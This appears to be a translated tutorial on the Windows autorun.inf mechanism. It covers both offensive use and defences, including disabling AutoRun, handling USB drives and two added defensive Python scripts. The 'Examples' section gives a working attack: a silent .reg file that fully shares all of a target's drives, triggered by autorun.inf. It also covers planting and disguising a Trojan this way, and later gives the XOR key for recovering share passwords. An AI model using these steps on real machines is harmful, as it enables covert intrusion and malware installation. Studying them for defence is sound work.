Principle of virus self-running self-replication

Source: Internet
Author: User
Tags: ultraedit
Recently, autorun.inf files have been widely used to turn every hard disk on a target machine into a full share, or to launch a Trojan. Because autorun.inf is rarely discussed in hacking circles there is little material on it, and many people find it mysterious. This article tries to close that gap so that you can fully understand this seemingly involved but very interesting technique.

I. Theoretical Basis

Anyone who uses CDs regularly knows that many discs start running as soon as they are put into the drive. How is that done? Automatic execution when a disc is inserted relies on two files. One is the autorun.inf file on the disc; the other is a system file of the operating system itself, Cdsealing.VxD, which watches the optical drive for activity. When a disc is inserted, it looks for an autorun.inf file in the root directory of the CD and, if one exists, executes the program preset in it.

autorun.inf does not only let CDs run programs automatically; it works for hard disks as well. The method is simple. Create a new text file in Notepad, right-click it, choose "Rename" from the pop-up menu and name it Autorun.INF. Then type the following into Autorun.INF:

[Autorun]        ; marks the start of the autorun section; required
Icon=C:\C.ICO    ; gives drive C a personalised icon, the file C.ICO
Open=C:\1.exe    ; the program to run and where it lives; here 1.exe is in the root of drive C

The "[Autorun]" line has a fixed format. The "Icon" line names the icon file: "C:\C.ICO" is the path and file name, and you can change it to the path and file name of your own icon file. ".ICO" is the extension of an icon file; if you have none to hand, convert an image in another format to ICO with ACDSee. Simply renaming a .BMP file to .ICO does not produce a valid icon, because the ICO format differs from BMP; a real conversion is needed.

The "Open" line names the file to run automatically, with its drive letter and path. If the drive or directory you are customising has no program you want to run, delete the "Open" line; otherwise, because Windows cannot find the program, double-clicking the drive no longer opens it, and you can only open it by right-clicking the drive letter and choosing "Open" from the pop-up menu.

Note: the file must be saved as "autorun.inf", and both it and the icon file must be placed in the root directory of the hard disk. Going further, if the contents of a hard disk are fairly stable for the time being, you could build an auto-playing presentation in Flash and point autorun.inf at it, giving you a hard disk with a highly personal touch.

That is not all. As you know, right-clicking the icon of some CDs produces a special context menu. Giving our hard disk the same behaviour is even more distinctive. A CD achieves it with just two statements in its autorun.inf file:

shell\verb=text shown in the right-click menu

shell\verb\command=file to execute, or a command line

Add these statements to the autorun.inf file and the hard disk gets its own context menu entry, for example:

shell\1=Upload example
shell\1\command=notepad "Upload example.txt"

Note: the file "Upload example.txt" is in the root directory of the hard disk, and notepad is the built-in Notepad program. If the file to execute is itself an executable, put its file name directly after "command=".

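The following parser is an added example written for this edit; it is not code from the original article. It reads an autorun.inf of the form described above and lists every way the file can launch a program: the Open= line, each shell\verb\command= entry together with the menu text from the matching shell\verb= line, and the standard shellexecute= key, which the article does not cover but which a scanner must treat the same way as Open=. The sample autorun.inf embedded in the block is constructed for the example.

```python
"""Parse an autorun.inf and report what Windows would launch from it.

Added example for this article, not code from the original page. The sample
autorun.inf below is constructed to mirror the [Autorun] entries the article
describes (Icon=, Open=, shell\verb= and shell\verb\command=).
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: the kind of file the article describes writing to a
# drive root. The shell verb "1" adds a right-click menu entry.
SAMPLE_AUTORUN_INF = r"""
[Autorun]
; drive icon and default double-click action
Icon=C:\C.ICO
Open=C:\1.exe
shell\1=Upload example
shell\1\command=notepad "Upload example.txt"
"""


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INF/INI reader: sections and key=value pairs, case-insensitive,
    ';' comment lines ignored. Keys are lower-cased so 'Open' and 'open' compare equal."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = re.match(r"^\[(.+?)\]$", line)
        if m:
            current = m.group(1).lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_actions(text: str) -> List[Tuple[str, str]]:
    """Return (trigger, command) pairs: every way this autorun.inf can run a
    program. 'open' fires on double-click; shell\<verb>\command fires from the
    context menu (and, when shell=<verb> is set, on double-click as well)."""
    autorun = parse_ini(text).get("autorun", {})
    actions: List[Tuple[str, str]] = []
    if "open" in autorun:
        actions.append(("open (double-click)", autorun["open"]))
    # shellexecute= is a standard autorun.inf key not discussed in the article;
    # a scanner must still report it since it launches a file or URL like open= does.
    if "shellexecute" in autorun:
        actions.append(("shellexecute (double-click)", autorun["shellexecute"]))
    default_verb = autorun.get("shell", "").lower()
    for key, value in autorun.items():
        m = re.match(r"^shell\\([^\\]+)\\command$", key)
        if m:
            verb = m.group(1)
            label = autorun.get(f"shell\\{verb}", verb)
            trigger = f"context menu '{label}'"
            if verb == default_verb:
                trigger += " (also default double-click)"
            actions.append((trigger, value))
    return actions


def is_suspicious(text: str) -> bool:
    """Heuristic from the article's defence section: a drive root carrying an
    autorun.inf that launches anything at all deserves a look, since a normal
    USB stick or hard disk should not have one."""
    return bool(launch_actions(text))


if __name__ == "__main__":
    for trigger, cmd in launch_actions(SAMPLE_AUTORUN_INF):
        print(f"{trigger:45s} -> {cmd}")
```

Run against the root of each removable drive, the report tells you what a double-click or a context-menu click would execute before you do either; an Icon= line on its own is not flagged.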
II. Examples

Here is an example. Suppose you scan a machine whose port 139 is open with sharing enabled, but it only shares drive D, and you want every drive on it shared. First edit a registry file: open Notepad and type the following:

REGEDIT4

; the line above must be left blank
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LANMAN\C$]
"Path"="C:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parm1enc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LANMAN\D$]
"Path"="D:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parm1enc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LANMAN\E$]
"Path"="E:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parm1enc"=hex:
"Parm2enc"=hex:

Above I have only gone as far as drive E; if the target has more logical drives, add them yourself. Save this as share.reg for later. Note that REGEDIT4 is written in upper case, flush left on the first line; the line after it is blank, and the file must end with an empty line (press Enter once after the last line).

Open Notepad, write an autorun.inf file and enter the following:

[Autorun]
Open=regedit /s share.reg    ; the /s switch makes the import silent, with no prompt or confirmation

Save the autorun.inf file. Copy share.reg and autorun.inf to the root directory of the target's drive D. Now all the target has to do is double-click drive D, and share.reg is imported into the registry; after the machine restarts, all of its drives are fully shared.

If you want to plant a Trojan on the peer instead, change "Open=regedit /s share.reg" in autorun.inf to "Open=<Trojan server file name>", then copy autorun.inf together with the configured Trojan server to the root directory of the target's drive D. The target never has to run the server program itself; simply double-clicking drive D runs the Trojan! The obvious benefit is that it greatly increases the chance that the Trojan actually gets run. Note: many people are vigilant now and will not casually run an unfamiliar file, and this method is hard to defend against.

It should be said that whoever sends you a Trojan will not be so careless as to leave it undisguised. Usually they rename the server file to something appealing or very close to a system file name, change its icon so that it looks like a TXT, ZIP or image file, and finally modify the Trojan's resources so that anti-virus software does not recognise it. Once the victim believes it is genuine, the Trojan gets into the system. Seen from the other side it is not hard to understand: if you were sending someone a Trojan, you would do the same. The autorun.inf technique described above is a supplement to these disguises.

III. Defense methods

The category of a share is determined entirely by the Flags value, whose setting decides the type of the shared directory. With Flags=0x302, after a restart the sharing mark (the hand under the drive icon) disappears, yet the directory is still fully shared; the popular Internet share worms exploit exactly this. Change "Flags"=dword:00000302 to "Flags"=dword:00000402 and the shared hard disk becomes visibly marked. Understand? That is the secret.

In the registry file above, Parm1enc and Parm2enc hold the obfuscated share passwords. The system takes the password (at most 8 characters) and XORs it with the 8-byte key "35 9A 4B A6 53 A9 D4 6A". To recover the password, XOR the stored bytes with the same key again and read the result from the ASCII table. At least one network tool uses this property to crack share passwords: from one machine it displays the share password of another computer on the local network.

NetHacker II, a tool built on TCP/IP, can traverse the Internet, find hosts with shares and then operate on them. So be careful when you dial in with a modem: your host may end up fully shared with the other party.

The fix is to delete "C$", "D$" and "E$" under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LANMAN, delete vserver.vxd from Windows\System (it is the virtual device driver for file and printer sharing on Microsoft networks), and then delete the VSERVER key under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD to be safe.

In addition, disabling the hard disk AutoRun function is an effective way to stop this kind of intrusion. Choose "Run" from the Start menu, enter Regedit to open the Registry Editor, and expand HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. In the right pane find "NoDriveTypeAutoRun", which decides whether the CD-ROM or hard disk AutoRun function is executed.

Double-click NoDriveTypeAutoRun. Its default value is 95,00,00,00 (figure 2). The first byte, 95, is a hexadecimal value: the sum of all device types whose AutoRun is disabled. 95 in binary is 10010101, and each bit represents one device type. Windows represents the device types by the following values:

Device name         Type  Bit in 95h  Mask  Meaning
DRIVE_UNKNOWN       0     1           01h   unrecognisable device type
DRIVE_NO_ROOT_DIR   1     0           02h   drive without a root directory
DRIVE_REMOVABLE     2     1           04h   removable drive
DRIVE_FIXED         3     0           08h   fixed drive
DRIVE_REMOTE        4     1           10h   network drive
DRIVE_CDROM         5     0           20h   optical drive (CD-ROM)
DRIVE_RAMDISK       6     0           40h   RAM disk
(reserved)          7     1           80h   drive types not yet specified

In the table, a bit value of 0 means AutoRun is enabled for that device type and 1 means it is disabled. By default Windows disables AutoRun for 80h, 10h, 04h and 01h; these add up to exactly 95h, which is why the default value of NoDriveTypeAutoRun is 95,00,00,00. So by default the device types that do AutoRun are DRIVE_NO_ROOT_DIR, DRIVE_FIXED, DRIVE_CDROM and DRIVE_RAMDISK. To stop autorun.inf from running on the hard disk, set the DRIVE_FIXED bit to 1, since DRIVE_FIXED means a fixed drive, i.e. the hard disk. The original 10010101 (read the "Bit" column of the table from bottom to top) becomes 10011101, which is 9D in hexadecimal. Change the value of NoDriveTypeAutoRun to 9D,00,00,00 and close the Registry Editor. After a restart, the hard disk AutoRun function is off.

If you have followed this, you also know how to disable the CD AutoRun function: set the DRIVE_CDROM bit to 1, making the first byte 10110101, i.e. B5. Change it to B5, close the Registry Editor and restart, and CD-ROM AutoRun is disabled. To turn off AutoRun for both the hard disk and the optical drive at once, set both bits: 10111101, i.e. BD,00,00,00.

To restore the AutoRun function of the hard disk or optical drive, reverse the change.
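An added example, not code from the original article, that does the bit arithmetic of this section in code: it decodes a NoDriveTypeAutoRun value as regedit stores it (a little-endian DWORD, 95 00 00 00 by default), lists the drive types whose AutoRun is disabled, and builds the 9D, B5 and BD values by setting the DRIVE_FIXED and DRIVE_CDROM bits. The bit positions are those of the article's table; the reg_line helper emits the line you would paste into a .reg file under the Policies\Explorer key.

```python
"""Decode and build the NoDriveTypeAutoRun bitmask the article walks through.

Added example, not code from the original page. The value is a REG_BINARY
DWORD stored little-endian (95 00 00 00 by default); each set bit disables
AutoRun for one drive type. Bit positions follow the article's table.
"""
from typing import Iterable, List

DRIVE_TYPES = [  # (bit index, name) per the article's table
    (0, "DRIVE_UNKNOWN"),
    (1, "DRIVE_NO_ROOT_DIR"),
    (2, "DRIVE_REMOVABLE"),
    (3, "DRIVE_FIXED"),
    (4, "DRIVE_REMOTE"),
    (5, "DRIVE_CDROM"),
    (6, "DRIVE_RAMDISK"),
    (7, "RESERVED"),
]
BIT_OF = {name: bit for bit, name in DRIVE_TYPES}

WIN9X_DEFAULT = bytes.fromhex("95000000")   # the 95,00,00,00 the article shows


def from_reg_binary(value: bytes) -> int:
    """REG_BINARY bytes as regedit shows them (little-endian DWORD) -> int."""
    return int.from_bytes(value[:4].ljust(4, b"\0"), "little")


def to_reg_binary(mask: int) -> bytes:
    return mask.to_bytes(4, "little")


def disabled_types(mask: int) -> List[str]:
    """Drive types whose bit is 1, i.e. whose AutoRun is disabled."""
    return [name for bit, name in DRIVE_TYPES if mask & (1 << bit)]


def disable(mask: int, names: Iterable[str]) -> int:
    """Set the bit of each named drive type (AutoRun off for that type)."""
    for n in names:
        mask |= 1 << BIT_OF[n]
    return mask


def enable(mask: int, names: Iterable[str]) -> int:
    """Clear the bit of each named drive type (the reverse operation)."""
    for n in names:
        mask &= ~(1 << BIT_OF[n])
    return mask


def reg_line(mask: int) -> str:
    """The value line for a .reg file under HKEY_CURRENT_USER\\...\\Policies\\Explorer."""
    return '"NoDriveTypeAutoRun"=hex:' + ",".join(f"{b:02x}" for b in to_reg_binary(mask))


if __name__ == "__main__":
    default = from_reg_binary(WIN9X_DEFAULT)
    print(f"default {default:#04x}: AutoRun disabled for {disabled_types(default)}")
    no_hdd = disable(default, ["DRIVE_FIXED"])                 # article: 9D
    no_cd = disable(default, ["DRIVE_CDROM"])                  # article: B5
    both = disable(default, ["DRIVE_FIXED", "DRIVE_CDROM"])    # article: BD
    for m in (no_hdd, no_cd, both):
        print(f"{m:#04x} {reg_line(m)}")
```

Decoding first and then setting bits avoids the mistake of overwriting the default and re-enabling AutoRun for the network and removable drive types that 95h already blocks.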

In practice there is almost never a legitimate need for an autorun.inf in the root directory of a hard disk, so we can disable hard disk AutoRun outright. Then, even if an autorun.inf is placed in the root of the hard disk, Windows will not run the program it names, and the autorun.inf trick is defeated.

We should also make Windows display hidden shares. As everyone knows, in Windows 9x a share can be hidden by appending "$" to its name. For example, to share drive C of a computer named share invisibly, set the share name to C$; the shared drive C then does not appear when browsing and can only be reached by typing its exact path. A small modification to msnp32.dll, however, makes Windows display hidden shares.

Because msnp32.dll is in use while Windows is running it cannot be modified in place, so copy it from C:\Windows\System to the root of drive C and work on the copy. Open the copy with UltraEdit or another hex editor and search for the bytes "24 56 E8 17" (at offset 00003190 to 000031A0). Change "24" to "00", save, and close UltraEdit. Restart the computer into DOS mode and at the command prompt enter copy C:\msnp32.dll C:\Windows\System\msnp32.dll. Restart Windows, and the hidden shares are now visible when you browse.

Finally, a reminder: hacking tools such as NetHacker II, built on TCP/IP, can traverse the Internet, find hosts with shares and operate on them. So be careful when dialling in with a modem; one slip and your host is fully shared with the other party. The only way to prevent this is to check the system constantly, keep it patched, run anti-virus software regularly, use a firewall when online, watch for anything unusual, pay attention to the contents of any autorun.inf, disable sharing or at least avoid full sharing, and put a password on every share.
Prevention method:

Current USB flash drive viruses all get in through autorun.inf.
autorun.inf is a normal file, but it can be exploited for malicious operations.
Different people use autorun.inf to deliver different payloads, so one cannot say which virus is involved: it may be any virus, Trojan or hacking program.
Normally a USB flash drive should not contain an autorun.inf file.*
If you find an autorun.inf on the USB flash drive that you did not create yourself, delete it and run a virus scan as soon as possible.
If you find folders that look like the Recycle Bin or Rising anti-virus folders, compare them with the real Recycle Bin name on the hard disk and the genuine Rising folder name; if you confirm you did not create them, delete them.
Also, do not double-click a USB flash drive after inserting it. A better technique is to hold the Shift key down before inserting the drive and keep holding it for a while after insertion, then right-click the drive and choose "Explorer" to open it.
Note:
*: Some USB flash drive manufacturers also use autorun.inf for their own special designs, so that users can run the vendor's own programs; some vendors are confirmed to do this. It is therefore advisable to examine a newly bought USB flash drive first, or ask the sales staff.
